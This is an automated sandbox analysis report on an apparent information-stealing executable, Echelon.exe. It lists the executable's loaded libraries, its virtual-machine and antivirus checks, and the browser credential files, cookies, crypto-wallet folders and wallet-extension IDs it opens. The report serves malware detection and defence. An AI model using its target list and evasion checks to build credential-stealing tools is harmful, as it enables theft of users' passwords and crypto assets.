              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: oledlg.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: Echelon.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: Echelon.exeStatic file information: File size 6689112 > 1048576
              Source: Echelon.exeStatic PE information: section name: RT_CURSOR
              Source: Echelon.exeStatic PE information: section name: RT_BITMAP
              Source: Echelon.exeStatic PE information: section name: RT_ICON
              Source: Echelon.exeStatic PE information: section name: RT_MENU
              Source: Echelon.exeStatic PE information: section name: RT_DIALOG
              Source: Echelon.exeStatic PE information: section name: RT_STRING
              Source: Echelon.exeStatic PE information: section name: RT_ACCELERATOR
              Source: Echelon.exeStatic PE information: section name: RT_GROUP_ICON
              Source: Echelon.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3ac000
              Source: Echelon.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x15cc00
              Source: Echelon.exeStatic PE information: More than 200 imports for USER32.dll
              Source: Echelon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: Echelon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: Echelon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: Echelon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Echelon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: Echelon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: Echelon.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Echelon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: I:\lokibit\cpp\VSEncryptor\Win32\Release\VSEncryptor.pdb source: Echelon.exe
              Source: Echelon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: Echelon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: Echelon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: Echelon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: Echelon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: Echelon.exeStatic PE information: real checksum: 0x14fdc27 should be: 0x662ee4
              Source: C:\Users\user\Desktop\Echelon.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Echelon.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exe TID: 764Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exe TID: 3136Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: Echelon.exe, 00000000.00000002.2321403698.00000000015D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188527203.0000000004523000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: Echelon.exe, 00000000.00000002.2321403698.00000000015F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188527203.0000000004523000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: Echelon.exe, 00000000.00000002.2321403698.00000000015F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWE
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\Echelon.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Echelon.exe, 00000000.00000003.2277367726.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2277367726.000000000163D000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000002.2321403698.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2317978549.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000002.2321403698.00000000015F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Echelon.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: Echelon.exe PID: 3356, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Echelon.exe, 00000000.00000003.2277367726.000000000164F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
              Source: Echelon.exe, 00000000.00000003.2277367726.000000000164F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: Echelon.exe, 00000000.00000003.2277367726.000000000164F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: Echelon.exe, 00000000.00000003.2277367726.000000000164F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Echelon.exe, 00000000.00000003.2277367726.000000000164F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Echelon.exe, 00000000.00000003.2250780193.0000000001669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Echelon.exe, 00000000.00000003.2250780193.0000000001669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
